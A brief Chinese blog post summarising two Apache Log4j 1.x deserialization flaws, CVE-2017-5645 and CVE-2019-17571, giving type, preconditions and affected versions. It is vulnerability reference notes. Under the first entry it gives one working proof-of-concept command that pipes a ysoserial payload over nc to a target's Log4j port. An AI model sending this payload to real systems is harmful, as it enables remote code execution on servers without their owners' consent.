应用安全 - 工具 | 框架 - Apache - Apache Log4j - 漏洞 - 汇总

Date
2017

类型
Java反序列化导致远程代码执行

前置条件
log4j对应的端口对外开放

影响范围 

复现
java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc your-ip 4712

分析

CVE-2019-17571

Date
2019

类型
Java反序列化导致远程代码执行

前置条件
log4j对应的端口对外开放

影响范围
1.2.4 <= Apache Log4j <= 1.2.17

复现

分析

posted @ 2019-12-26 17:14 7hang 阅读(3390) 评论(1) 编辑收藏举报

刷新页面返回顶部

7hang.